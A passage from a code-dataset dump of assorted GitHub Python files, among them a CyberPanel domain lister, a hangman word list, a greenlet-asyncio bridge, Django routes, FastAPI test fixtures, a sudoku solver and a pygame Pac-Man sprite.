django\n\nsys.path.append('/usr/local/CyberCP')\nos.environ.setdefault(\"DJANGO_SETTINGS_MODULE\", \"CyberCP.settings\")\ntry:\n django.setup()\nexcept:\n pass\nfrom websiteFunctions.models import Websites\nimport argparse\nimport json\nfrom CLScript.CLMain import CLMain\n\n\nclass CloudLinuxDomains(CLMain):\n\n def __init__(self, name, owner):\n CLMain.__init__(self)\n self.owner = owner\n self.name = name\n\n def listAll(self):\n data = {}\n\n if self.owner !=None:\n websites = Websites.objects.filter(externalApp=self.owner)\n else:\n websites = Websites.objects.all()\n\n\n for webs in websites:\n if self.name != None:\n if self.name != webs.domain:\n continue\n data[webs.domain] = {\"owner\": webs.externalApp,\n \"document_root\": \"/home/%s/public_html/\" % (webs.domain),\n \"is_main\": True}\n for webs in webs.childdomains_set.all():\n data[webs.domain] = {\"owner\": webs.master.externalApp,\n \"document_root\": webs.path,\n \"is_main\": False}\n\n final = {'data': data, 'metadata': self.initialMeta}\n print(json.dumps(final))\n\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='CyberPanel CloudLinux Manager')\n parser.add_argument('-o', '--owner', help='Owner')\n parser.add_argument('-n', '--name', help='Owner')\n\n args = parser.parse_args()\n\n pi = CloudLinuxDomains(args.name, args.owner)\n try:\n pi.listAll()\n except:\n pi.listAll()\n","repo_name":"usmannasir/cyberpanel","sub_path":"CLScript/CloudLinuxDomains.py","file_name":"CloudLinuxDomains.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","stars":1302,"dataset":"github-code","pt":"21"} +{"seq_id":"8995441014","text":"#-------------------------------------------------------------------------------\r\n# Name: module1\r\n# Purpose:\r\n#\r\n# Author: Briche\r\n#\r\n# Created: 25/05/2021\r\n# Copyright: (c) Briche 2021\r\n# Licence: \r\n#-------------------------------------------------------------------------------\r\n\r\ndef main():\r\n pass\r\n\r\nif __name__ == '__main__':\r\n main()\r\nfrom tkinter import *\r\nfrom PIL import*\r\nfrom PIL import ImageTk, Image\r\n\r\ndico = {\"Astronomie\":1,\"Fruits & Légumes\":2,\"Etats des USA\":3,\"Marques de voiture\":4,\"Animaux\":5}\r\n\r\ndico[\"Astronomie\"] = {\"Soleil\", \"Planète\",\"Terre\",\"Vénus\",\"Mars\",\"Jupiter\",\"Saturne\",\"Etoile\"\r\n \"Pulsar\" , \"Quasar\",\"Supernova\",\"Lune\" ,\"Lumière\",\"Astronaute\",\"Galiléé\",\"Copernic\",\"Keppler\",\"Newton\",\r\n \"Satellite\",\"Fusée\" , \"NASA\" ,\"Cosmos\",\"Espace\",\"Télescope\",\"Ciel\",\"Atmsophère\",\"Nuage\",\r\n \"Vaisseau\",\"Soucoupe\",\"Amas\",\"Anneau\",\"Apex\",\"Astéroide\",\"Astre\",\"Aube\",\"Aurore\",\"Boréale\",\r\n \"Azimiut\",\"Orbite\",\"Stellaire\",\"Constellation\",\"Crépuscule\",\"Galaxie\",\"Eclipse\",\"Equateur\",\r\n \"Equinoxe\",\"Géocentrique\",\"Héliocentrique\" , \"Gravitation\",\"Magnitude\",\"Nébuleuse\",\"Neutrons\",\r\n \"Neutrino\",\"Boson\",\"Parallaxe\",\"Pléiade\",\"Précession\" ,\"Solstice\",\"Zodiaque\",\"Photon\"}\r\n\r\ndico[\"Fruits & Légumes\"] = {\"Bananne\",\"Kiwi\",\"Pomme\",\"Carotte\",\"Céleri\",\"Rave\",\"Oignon\",\"Fraise\",\"Navet\",\"Concombre\",\r\n \"Pois\",\"Avocat\",\"Radis\",\"Pêche\",\"Poire\",\"Brugnon\",\"Courgette\",\"Tomate\",\"Courge\",\"Cornichon\"\r\n , \"Mangue\",\"Anannas\",\"Poireau\" ,\"Abricot\", \"Cassis\", \"Cerise\", \"Figue\", \"Framboise\", \"Groseille\",\r\n \"Melon\", \"Mirabelle\", \"Mûre\", \"Myrtille\", \"Pastèque\", \"Pêche\", \"Prune\" , \"Artichaut\", \"Aubergine\",\r\n \"Blette\", \"Brocolis\", \"Carotte\", \"Concombre\", \"Fenouil\", \"Fève\", \"Haricot vert\", \"Pomme de terre\"\r\n ,\"Topinambour\",\"Rutababga\" ,\"Choux\",\"Citrouille\" ,\"Potiron\" ,\"Mache\" , \"Batavia\" , \"Endive\",\"Pourpier\"\r\n \"Groseille\",\"Lentille\",\"Clémentine\",\"Mandarine\",\"Noix\"}\r\n\r\n\r\ndico[\"Etats des USA\"] = { \"Alabama\", \"Alaska\",\"Arizona\", \"Arkansas\", \"Californie\", \"Colorado\", \"Connecticut\", \"Delaware\", \"Floride\",\r\n \"Hawaï\", \"Idaho\", \"Illinois\", \"Indiana\", \"Iowa\", \"Kansas\", \"Kentucky\", \"Louisiane\", \"Maine\", \"Maryland\", \"Massachusetts\", \"Michigan\",\r\n \"Minnesota\", \"Mississippi\", \"Missouri\", \"Montana\", \"Nebraska\", \"Nevada\", \"New Hampshire\", \"New Jersey\", \"Nouveau-Mexique\",\r\n \"Hawaï\",\"New York\", \"Caroline du Nord\", \"Dakota du Nord\", \"Ohio\", \"Oklahoma\", \"Oregon\", \"Pennsylvanie\", \"Rhode Island\",\r\n \"Caroline du Sud\", \"Dakota du Sud\", \"Tennessee\", \"Texas\", \"Utah\", \"Vermont\", \"Virginie\" , \"Washington\",\r\n \"Virginie occidentale\", \"Wisconsin\" , \"Wyoming\" }\r\n\r\n\r\ndico[\"Marques de voiture\"] = {\"Lexus\",\"Toyota\",\"Porsche\",\"Renault\",\"Peugeot\",\"Ligier\",\"Toyota\",\"Kia\",\"Suzuki\",\"Cadillac\",\"Pontiac\",\"Dodge\",\"Hyundai\",\r\n \"Genesis\",\"Lincoln\" , \"Acura\",\"Volskwagen\",\"Audi\",\"BMW\" ,\"Chevrolet\" , \"Mitsubushi\" , \"Ram\", \"Mini\", \"Subaru\",\"Nissan\",\r\n \"Mazda\",\"Mercedes\",\"Infinity\", \"Volvo\",\"Chrysler\", \"Jagua\",\"Alfa Romeo\",\"Honda\",\"Land Rover\",\"Tesla\" ,\"Buick\",\r\n \"Citroen\",\"Fiat\",\"Corvette\",\"Ferrari\",\"Lamborghini\",\"Seat\",\"Skoda\",\"Opel\",\"Dacia\",\"Excalibur\",\"Aston-Martin\",\"Daihatsu\",\"Daimler\"\r\n \"Lada\",\"Matra\",\"Lancia\",\"Lotus\",\"McLaren\",\"Mega\",\"Mazerati\",\"Rover\",\"Simca\",\"Triumph\",\"Saaab\",\"Hummer\",\"Cupra\",\"Delorean\",\"Autobianchi\"}\r\n\r\n\r\n\r\ndico[\"Animaux\"] = {\"Girafe\", \"Zèbre\", \"Ane\", \"Antilope\", \"Buffle\", \"Watusis\", \"Dromadaire\", \"Rhinocéro\", \"Eléphant\", \"Hippopotame\", \"Phacochère\",\r\n \"Potamochère\", \"Mouflon\", \"Ibex\" ,\"Autruche\", \"Pélican\", \"Cormoran\", \"Grue\", \"Cigogne\", \"Jabirus\", \"Marabout\", \"Tantale\",\r\n \"Pintade\", \"Outarde\", \"Calaos\", \"Mouette\", \"Dendrocygne\", \"Tadorne\", \"Canard\", \"Ibis\", \"Spatule\", \"Aigrette\", \"Héron\",\r\n \"Flamant\" , \"Oryx\", \"Addax\", \"Hippotrague\", \"Eland\", \"Gnou\", \"Bongo\", \"Nyala\", \"Koudou\", \"Cobe\", \"Sitatunga\", \"Blesbok\",\r\n \"Springbok\", \"Impala\", \"Gazelle\", \"Rat\", \"Cochon\", \"Hamster\", \"Chinchilla\", \"Dègue\", \"Gerbille\", \"Souris\", \"Putois\",\r\n \"Furet\" , \"Iguane\", \"Geckos\", \"Caméléon\", \"Scorpion\", \"Araignée\", \"Myriapode\" , \"Perruche\", \"Perroquet\", \"Diamant\",\r\n \"Canaris\", \"Mainate\", \"Toucan\", \"Poule\", \"Dindon\", \"Paon\", \"Oie\", \"Canard\", \"Hérisson\"}\r\n\r\n# il faut relier un des dico a un theme","repo_name":"hwwrg/Jeu-du-Pendu","sub_path":"dico_pendu.py","file_name":"dico_pendu.py","file_ext":"py","file_size_in_byte":4852,"program_lang":"python","lang":"hr","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"22545057267","text":"import asyncio\nfrom collections import deque\nimport functools\nimport sys\nfrom greenlet import greenlet, getcurrent\n\n\nclass GreenletBridge:\n def __init__(self):\n self.reset()\n\n def reset(self):\n self.starting = False\n self.running = False\n self.stopping = False\n self.bridge_greenlet = None\n self.wait_event = None\n self.scheduled = deque()\n\n def schedule(self, gl, *args, **kwargs):\n self.scheduled.append((gl, args, kwargs))\n if self.wait_event:\n self.wait_event.set()\n\n def run(self):\n async def async_run():\n self.starting = False\n self.stopping = False\n self.running = True\n while not self.stopping:\n self.wait_event.clear()\n while self.scheduled:\n gl, args, kwargs = self.scheduled.popleft()\n gl.switch(*args, **kwargs)\n await self.wait_event.wait()\n self.running = False\n\n # get the asyncio loop\n try:\n loop = asyncio.get_event_loop()\n except RuntimeError: # pragma: no cover\n loop = asyncio.new_event_loop()\n asyncio.set_event_loop(loop)\n\n self.wait_event = asyncio.Event()\n if not loop.is_running():\n # neither the loop nor the bridge are running\n # start a loop with the bridge task\n loop.run_until_complete(async_run())\n else:\n # the loop is already running, but the bridge isn't\n # start the bridge as a task\n loop.create_task(async_run())\n\n def start(self):\n assert not self.running and not self.starting\n self.reset()\n self.starting = True\n self.schedule(getcurrent())\n self.switch()\n\n def stop(self):\n if self.running:\n self.stopping = True\n self.wait_event.set()\n self.bridge_greenlet.parent = getcurrent()\n self.bridge_greenlet.switch()\n\n def switch(self):\n if self.bridge_greenlet is None:\n self.bridge_greenlet = greenlet(self.run)\n if self.wait_event:\n self.wait_event.set()\n return self.bridge_greenlet.switch()\n\n\nbridge = GreenletBridge()\n\n\ndef async_(fn):\n @functools.wraps(fn)\n def decorator(*args, **kwargs):\n if not bridge.running and not bridge.starting:\n bridge.start()\n\n async def coro(fn, *args, **kwargs):\n future = asyncio.Future()\n\n def gl(future, fn, *args, **kwargs):\n try:\n future.set_result(fn(*args, **kwargs))\n except: # noqa: E722\n future.set_exception(sys.exc_info()[1])\n\n bridge.schedule(greenlet(gl), future, fn, *args, **kwargs)\n return await future\n\n return coro(fn, *args, **kwargs)\n\n return decorator\n\n\ndef await_(coro_or_fn):\n if asyncio.iscoroutine(coro_or_fn):\n # we were given a coroutine --> await it\n if not bridge.running:\n bridge.start()\n\n async def run_in_aio(gl):\n ret = None\n exc_info = None\n try:\n ret = await coro_or_fn\n except: # noqa: E722\n exc_info = sys.exc_info()\n bridge.schedule(gl, (ret, exc_info))\n\n asyncio.get_event_loop().create_task(run_in_aio(getcurrent()))\n ret, exc_info = bridge.switch()\n if exc_info:\n raise exc_info[0].with_traceback(exc_info[1], exc_info[2])\n return ret\n else:\n # assume decorator usage\n @functools.wraps(coro_or_fn)\n def decorator(*args, **kwargs):\n return await_(coro_or_fn(*args, **kwargs))\n\n return decorator\n","repo_name":"sourcery-ai-bot/greenletio","sub_path":"greenletio/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":3776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"27658677237","text":"import numpy as np\nimport os\nimport matplotlib.pyplot as plt\n# from mpl_toolkits.mplot3d import Axes3D\n\n\nclass Plot_pareto:\n def __init__(self):\n # Create coords directory\n if os.path.exists('./coords') == False:\n os.makedirs('./coords')\n print(\n '\\nCreating folder coords : Save coordinates of pareto values and fitness of all algorithms')\n # Create image directory\n if os.path.exists('./imgs') == False:\n os.makedirs('./imgs')\n print('\\nCreating folder imgs : Save image of each iteration')\n\n def show(self, fitness_, archive_fitness, i):\n # 3D plot for 3 objectives\n # if fitness_.shape[1] == 3:\n # fig = plt.figure()\n # ax = fig.add_subplot(111, projection='3d')\n # # ax.scatter(fitness_[:, 0], fitness_[:, 1],\n # # fitness_[:, 2], c='blue', marker='.')\n # ax.scatter(archive_fitness[:, 0], archive_fitness[:, 1],\n # archive_fitness[:, 2], c='red', marker='.')\n # ax.set_title('Iteration'+str(i+1))\n # ax.set_xlabel('fitness_y1')\n # ax.set_ylabel('fitness_y2')\n # ax.set_zlabel('fitness_y3')\n\n # 2D plot for 2 objectives\n if fitness_.shape[1] == 2:\n plt.title('MOPSO+_Iteration_'+str(i+1))\n plt.xlabel('fitness_y1')\n plt.ylabel('fitness_y2')\n plt.scatter(\n archive_fitness[:, 0], archive_fitness[:, 1], s=30, c='red', marker=\".\", alpha=1.0)\n\n plt.savefig('./imgs/MOPSO+_Iteration_'+str(i+1)+'.png')\n plt.close()\n","repo_name":"siddarthgopalakrishnan/hybrid-mopso","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"10522965750","text":"from dmc import gettoken\nimport http.client\nimport json\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG)\n\nheaders = {\n \"X-CENTRIFY-NATIVE-CLIENT\": \"true\",\n \"X-CFY-SRC\": \"python\",\n \"Authorization\": \"Bearer %s\" % gettoken(\"YOUR_SCOPE\")\n}\nconn = http.client.HTTPSConnection(\"aaa0001-hk.my.centrify-dev.net\")\nconn.request(\"POST\", \"/security/whoami\", headers = headers)\nresponse = conn.getresponse()\nprint(response.status)\nret = json.loads(response.read().decode())\nprint(ret[\"Result\"][\"User\"])","repo_name":"centrify/dmc-python","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":506,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12681241520","text":"from django.conf.urls import url, include\nfrom django.contrib import admin\nfrom django.contrib.auth.views import login, logout\n\nfrom core import views\n\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^contato/$', views.contact, name='contact'),\n url(r'^entrar/$', login, {'template_name': 'login.html'}, name='login'),\n url(r'^sair/$', logout, {'next_page': 'index'}, name='logout'),\n url(r'^apresentacao/', views.apresentacao, name='presentation'),\n url(r'^solucao/', views.solucao, name='solution'),\n url(r'^monitoramento/', views.monitoramento, name='monitoring'),\n url(r'^emergencia/', views.emergencia, name='emergency'),\n url(r'^conta/', include('accounts.urls', namespace='accounts')),\n url(r'^admin/', admin.site.urls),\n url(r'^api/', include('api.urls', namespace='api')),\n]\n","repo_name":"cesarbcruz/ProjectMobileHealth","sub_path":"MobileHealthWeb/mobilehealth/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":833,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"168297472","text":"import numpy as np\nfrom dataset import dataset_all_2, dataset_all\nfrom sklearn.manifold import TSNE\nimport matplotlib.pyplot as plt\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\n\"\"\"\nDo feature visualization task\n\"\"\"\n#%% read needed data\n# read the temperatures and spectra generated by uniform profiles\ndata_dir_0='./input/data_uniform/file'\nlabel_dir_0='./input/data_uniform/label'\nspec_0,temp_0,__,___=dataset_all(data_dir_0,label_dir_0)\n# read the temperatures and spectra generated by nonuniform profiles--5points\ndata_dir_1='./input/data_nonuniform/file'\nlabel_dir_1='./input/data_nonuniform/label'\norder_dir_1='./file_reading_order.csv'\nspec_1,_,__,__=dataset_all_2(data_dir_1,label_dir_1,order_dir_1)\ntemp_dif_dir='./input/temp_dif_data/1e-3/temp_dens_comp.csv'\ntemp_dif_select=np.loadtxt(temp_dif_dir)\ntemp_1=temp_dif_select[:,3]\n# read the temperatures and spectra generated by nonuniform profiles--10points\ndata_dir_2='./input/data_10p/file'\nlabel_dir_fake='./input/data_10p/label'\nspec_2,_1,_2,_3=dataset_all(data_dir_2,label_dir_fake)\nlabel_dir_2='./input/data_10p/dens_temp_10p.csv'\ntemp_2=np.loadtxt(label_dir_2)\n\ndata_all=np.vstack((spec_0[:500],spec_1[:500],spec_2[:500]))\n#%%\ndata_all_max=np.max(data_all,0)\ndata_all_min=np.min(data_all,0)\ndata_all_norm=(data_all-data_all_min)/(data_all_max-data_all_min)\n#%% TSNE\ntsne=TSNE(init='random',random_state=555,n_components=2)\nembedding=tsne.fit_transform(data_all_norm)\nx_min, x_max = embedding.min(0), embedding.max(0)\n# all_norm=embedding\nall_norm = (embedding - x_min) / (x_max - x_min) # normalization\nembed_0=all_norm[:500]\nembed_1=all_norm[500:1000]\nembed_2=all_norm[1000:1500]\n#%% plot figure\nplt.rcParams.update({\"font.size\": 15})\nplt.figure()\nplt.scatter(embed_0[:,0],embed_0[:,1],c='k')\nplt.scatter(embed_1[:,0],embed_1[:,1],c='r')\nplt.scatter(embed_2[:,0],embed_2[:,1],c='b')\nplt.legend([\"Uniform\",\"5 sections\",\"10 sections\"])\nplt.xlabel(\"Feature 2\")\nplt.ylabel(\"Feature 1\")\nplt.xlim([0,1])\nplt.ylim([0,1])\nplt.tight_layout()\n# plt.savefig('output/T_SNE-2')\nplt.show()\nplt.close()\n\n#%% Linear Discrimantal analysis\n# DATA SET PREPARE\nall_temp=np.hstack((temp_0[0:500],temp_1[0:500],temp_2[0:500]))\nall_temp_norm=(all_temp-all_temp.min())/(all_temp.max()-all_temp.min())\n# all_temp_reshape=all_temp.reshape([-1,1])\n# final_set=np.hstack((data_all,all_temp_reshape))\nfinal_set=np.zeros_like(data_all_norm)\nfor i in range(final_set.shape[0]):\n final_set[i]=data_all_norm[i]+all_temp_norm[i] # merge temperature and spectral information\nlabel=np.zeros([1500,1]).squeeze()\nlabel[500:1000]=1\nlabel[1000:1500]=2\n#%% LDA, exclude the temperature information\nclf = LinearDiscriminantAnalysis(n_components=2)\nclf.fit(data_all_norm,label)\ntransform_data=clf.transform(data_all_norm)\ntransform_data=(transform_data-transform_data.min(0))/(transform_data.max(0)-transform_data.min(0))\nembed_0_new=transform_data[0:500]\nembed_1_new=transform_data[500:1000]\nembed_2_new=transform_data[1000:1500]\n#%% visualization\nplt.rcParams.update({\"font.size\": 15})\nplt.figure()\nplt.scatter(embed_0_new[:,0],embed_0_new[:,1],c='k')\nplt.scatter(embed_1_new[:,0],embed_1_new[:,1],c='r')\nplt.scatter(embed_2_new[:,0],embed_2_new[:,1],c='b')\nplt.legend([\"Uniform\",\"5 sections\",\"10 sections\"])\nplt.xlabel(\"Feature 2\")\nplt.ylabel(\"Feature 1\")\nplt.xlim([0,1])\nplt.ylim([0,1])\nplt.tight_layout()\n# plt.savefig('output/LDA_no_aggregate')\nplt.show()\nplt.close()\n\n#%% train LDV MODEL, include the temperature information\nclf = LinearDiscriminantAnalysis(n_components=2,store_covariance=True)\nclf.fit(final_set,label)\n\ntransform_data=clf.transform(final_set)\ntransform_data=(transform_data-transform_data.min(0))/(transform_data.max(0)-transform_data.min(0))\nembed_0_new=transform_data[0:500]\nembed_1_new=transform_data[500:1000]\nembed_2_new=transform_data[1000:1500]\n\n#%% visualization\nplt.rcParams.update({\"font.size\": 15})\nplt.figure()\nplt.scatter(embed_0_new[:,0],embed_0_new[:,1],c='k')\nplt.scatter(embed_1_new[:,0],embed_1_new[:,1],c='r')\nplt.scatter(embed_2_new[:,0],embed_2_new[:,1],c='b')\nplt.legend([\"Uniform\",\"5 sections\",\"10 sections\"])\nplt.xlabel(\"Feature 2\")\nplt.ylabel(\"Feature 1\")\nplt.xlim([0,1])\nplt.ylim([0,1])\nplt.tight_layout()\n# plt.savefig('output/LDA_multiple')\nplt.show()\nplt.close()\n\n#%% tsne\ntsne=TSNE(init='random',random_state=555,n_components=2)\ntransform_data=tsne.fit_transform(final_set)\ntransform_data=(transform_data-transform_data.min(0))/(transform_data.max(0)-transform_data.min(0))\nembed_0_new=transform_data[0:500]\nembed_1_new=transform_data[500:1000]\nembed_2_new=transform_data[1000:1500]\n#%%\n# plt.rcParams.update({\"font.size\": 15})\nplt.figure()\nplt.scatter(embed_0_new[:,0],embed_0_new[:,1],c='k')\nplt.scatter(embed_1_new[:,0],embed_1_new[:,1],c='r')\nplt.scatter(embed_2_new[:,0],embed_2_new[:,1],c='b')\nplt.legend([\"Uniform\",\"5 sections\",\"10 sections\"])\nplt.xlabel(\"Feature 2\")\nplt.ylabel(\"Feature 1\")\nplt.xlim([0,1])\nplt.ylim([0,1])\nplt.tight_layout()\n# plt.savefig('output/TSNE-multiple')\nplt.show()\nplt.close()","repo_name":"RalphKang/nonuniformity-effect-on-LAS--temperature-measurement","sub_path":"data_preprocess_postprocess/data_cluster_visulization.py","file_name":"data_cluster_visulization.py","file_ext":"py","file_size_in_byte":5017,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71923456053","text":"from typing import Dict, Generator\n\nimport pytest\nfrom fastapi.testclient import TestClient\nfrom sqlalchemy.orm import Session\n\nfrom app import models, crud, schemas\nfrom app.core.config import settings\nfrom app.db.session import SessionLocal\nfrom app.main import app\nfrom app.tests.utils.user import authentication_token_from_email\nfrom app.tests.utils.utils import get_superuser_token_headers\nfrom mixer.backend.sqlalchemy import Mixer\n\nTEST_SALES_CONSULTANT_USER = \"sales-consultant@test.com\"\nTEST_CASHIER_USER = \"cashier@test.com\"\nTEST_PRODUCT_NAME = \"TEST PRODUCT\"\n\n\n@pytest.fixture(scope=\"session\")\ndef db() -> Generator:\n session: Session = SessionLocal()\n yield session\n session.rollback()\n session.close()\n\n\n@pytest.fixture(scope=\"module\")\ndef client() -> Generator:\n with TestClient(app) as c:\n yield c\n\n\n@pytest.fixture(scope=\"module\")\ndef superuser_token_headers(client: TestClient) -> Dict[str, str]:\n return get_superuser_token_headers(client)\n\n\n@pytest.fixture(scope=\"module\")\ndef normal_user_token_headers(client: TestClient, db: Session) -> Dict[str, str]:\n return authentication_token_from_email(\n client=client, email=settings.EMAIL_TEST_USER, db=db\n )\n\n\n@pytest.fixture(scope=\"module\")\ndef sales_consultant_user_token_headers(client: TestClient, db: Session) -> Dict[str, str]:\n return authentication_token_from_email(\n client=client, email=TEST_SALES_CONSULTANT_USER, db=db, role=models.RoleUser.sales_consultant.value\n )\n\n\n@pytest.fixture(scope=\"module\")\ndef cashier_user_token_headers(client: TestClient, db: Session) -> Dict[str, str]:\n return authentication_token_from_email(\n client=client, email=TEST_CASHIER_USER, db=db, role=models.RoleUser.cashier.value\n )\n\n\n@pytest.fixture(scope=\"module\")\ndef mixer(db: Session):\n return Mixer(session=db, commit=False)\n\n\n@pytest.fixture\ndef test_product(db: Session) -> models.Product:\n product = db.query(models.Product).filter(models.Product.name == TEST_PRODUCT_NAME).first()\n if not product:\n product = crud.product.create(db, obj_in=schemas.CreateProduct(\n name=TEST_PRODUCT_NAME,\n price=100\n ))\n return product\n\n\n@pytest.fixture\ndef test_order_created(db: Session, test_product) -> models.Product:\n order = db.query(models.Order).filter(models.Order.product_id == test_product.id).first()\n if not order:\n order = crud.product.create(db, obj_in=schemas.CreateOrder(\n product_id=test_product.id\n ))\n if order.bill:\n crud.bill.remove(db, id=order.bill.id)\n\n order.status = models.OrderStatuses.created.value\n\n db.add(order)\n db.commit()\n db.refresh(order)\n return order\n\n\n@pytest.fixture\ndef test_order_ready(db: Session, test_order_created) -> models.Product:\n test_order_created.status = models.OrderStatuses.ready.value\n\n db.add(test_order_created)\n db.commit()\n db.refresh(test_order_created)\n return test_order_created\n","repo_name":"DImasBo/ecommerce-testove","sub_path":"backend/app/app/tests/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":2976,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"45695344","text":"list1=[1,2,3,4,5]\nlist2=[2,4,6,8,10]\na=len(list1)\nb=len(list2)\nif(a==b):\n print(\"both lists have same length \",a)\nelse:\n print(\"both have different lengths\",a,b)\nif(sum(list1)==sum(list2)):\n print(\"both the sum are same\")\nelse:\n print(\"both the sums are not same\")\nprint(\"common element are\")\nfor i in list1:\n for j in list2:\n if(i==j):\n print(i)","repo_name":"amalbabu2024/amal","sub_path":"amal/expno15.py","file_name":"expno15.py","file_ext":"py","file_size_in_byte":379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20117418168","text":"import re\n\nwith open('input.txt', 'r') as f:\n count = 0\n for line in f.readlines():\n data = line.split('\\n')[0]\n\n match_pairs = re.match(r'[a-z]*([a-z]{2})[a-z]*\\1[a-z]*', data)\n match_consec = re.match(r'[a-z]*([a-z])[a-z]\\1[a-z]*', data)\n if match_pairs and match_consec:\n count += 1\n \n print(count)\n","repo_name":"rubengrootroessink/AdventOfCode","sub_path":"2015/05/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":357,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28826161532","text":"from ColorChalks import ColorChalks\n\nN = 9\ndef print_board(board):\n for i in range(9):\n for j in range(9):\n print([board[i][j]], end=\"\")\n print()\n\n\n# a function to check if its possible to place a number in given position or not\ndef possible(board, row, col, num):\n for x in range(9):\n if board[row][x] == num:\n return False\n \n if board[x][col] == num:\n return False\n \n # Check for 3 x 3 matrix\n startrow = row - row % 3\n startcol = col - col % 3\n for i in range(3):\n for j in range(3):\n if board[i + startrow][j + startcol] == num:\n return False\n \n return True\n\ndef solve(board, row, col): \n if(row == N - 1 and col == N):\n return True\n \n if col == N: \n row += 1\n col = 0\n\n ## if col is not empty, then move on to next col\n if board[row][col] != 0:\n return solve(board, row, col+1)\n \n for num in range(1, N + 1):\n if possible(board, row, col, num) == True: \n board[row][col] = num\n if solve(board, row, col+1):\n return True\n board[row][col] = 0\n \n return False\n\n\nl = list();\nboard = list()\nprint(ColorChalks.FCOLORS.Blue + \"Enter Rows of sudoku board (0 for empty places) i.e. 100200090\")\nfor i in range(9):\n print(ColorChalks.FCOLORS.Yellow + \"EnterRow\", i + 1)\n n = str(input(\"\\n: \"))\n l.append(n)\nfor x in l:\n n = [*x]\n board.append(n)\nfor y in range(9):\n for w in range(9):\n board[y][w] = int(board[y][w])\nfor rows in range(9): \n print(board[rows])\n\n\nif (solve(board, 0, 0)):\n print(ColorChalks.FCOLORS.Green + \"\\nSolution: \")\n print_board(board)\nelse: \n print(\"no soluiton\")","repo_name":"Sagar-Sharma-7/Sudoku-Solver-CLI","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"47340323254","text":"#!/usr/bin/env python\n\nimport logging\nimport pygame\nimport pygame.locals\n\nimport basicSprite\n\n\n_moduleLogger = logging.getLogger(__name__)\n\n\nSUPER_STATE_START = pygame.USEREVENT + 1\nSUPER_STATE_OVER = SUPER_STATE_START + 1\nPLAYER_EATEN = SUPER_STATE_OVER + 1\n\n\nclass greenMan(basicSprite.Sprite):\n\tdef __init__(self, centerPoint, image):\n\t\tbasicSprite.Sprite.__init__(self, centerPoint, image)\n\t\tself.pellets = 0\n\t\tself.x_dist = 8\n\t\tself.y_dist = 8\n\t\tself.xMove = 0\n\t\tself.yMove = 0\n\t\tself.superState = False\n\n\tdef MoveKeyDown(self, key):\n\t\tif (key == pygame.locals.K_RIGHT):\n\t\t\tself.xMove += self.x_dist\n\t\telif (key == pygame.locals.K_LEFT):\n\t\t\tself.xMove += -self.x_dist\n\t\telif (key == pygame.locals.K_UP):\n\t\t\tself.yMove += -self.y_dist\n\t\telif (key == pygame.locals.K_DOWN):\n\t\t\tself.yMove += self.y_dist\n\n\tdef MoveKeyUp(self, key):\n\t\tif (key == pygame.locals.K_RIGHT):\n\t\t\tself.xMove += -self.x_dist\n\t\telif (key == pygame.locals.K_LEFT):\n\t\t\tself.xMove += self.x_dist\n\t\telif (key == pygame.locals.K_UP):\n\t\t\tself.yMove += self.y_dist\n\t\telif (key == pygame.locals.K_DOWN):\n\t\t\tself.yMove += -self.y_dist\n\n\tdef update(self, block_group, pellet_group, super_pellet_group, monster_group):\n\t\tif (self.xMove==0)and(self.yMove==0):\n\t\t\treturn\n\t\tself.rect.move_ip(self.xMove, self.yMove)\n\t\tif pygame.sprite.spritecollideany(self, block_group):\n\t\t\tself.rect.move_ip(-self.xMove, -self.yMove)\n\t\tlst_monsters = pygame.sprite.spritecollide(self, monster_group, False)\n\t\tif (len(lst_monsters)>0):\n\t\t\tself.MonsterCollide(lst_monsters)\n\t\telse:\n\t\t\tlstCols = pygame.sprite.spritecollide(self, pellet_group, True)\n\t\t\tif (len(lstCols)>0):\n\t\t\t\tself.pellets += len(lstCols)\n\t\t\telif (len(pygame.sprite.spritecollide(self, super_pellet_group, True))>0):\n\t\t\t\tself.superState = True\n\t\t\t\tpygame.event.post(pygame.event.Event(SUPER_STATE_START, {}))\n\t\t\t\tpygame.time.set_timer(SUPER_STATE_OVER, 0)\n\t\t\t\tpygame.time.set_timer(SUPER_STATE_OVER, 8000)\n\n\tdef MonsterCollide(self, lstMonsters):\n\t\tif(len(lstMonsters)<=0):\n\t\t\treturn\n\t\tfor monster in lstMonsters:\n\t\t\tif (monster.scared):\n\t\t\t\tmonster.Eaten()\n\t\t\telse:\n\t\t\t\tpygame.event.post(pygame.event.Event(PLAYER_EATEN, {}))\n","repo_name":"frummage/omnom","sub_path":"omnom/greenManSprite.py.py","file_name":"greenManSprite.py.py","file_ext":"py","file_size_in_byte":2138,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"15936797711","text":"\nimport os\nclass ProfileDatum(object):\n def __init__(self,\n device_name,\n node_exec_stats,\n file_path,\n line_number,\n func_name,\n op_type):\n \"\"\"Constructor.\n Args:\n device_name: (string) name of the device.\n node_exec_stats: `NodeExecStats` proto.\n file_path: path to the 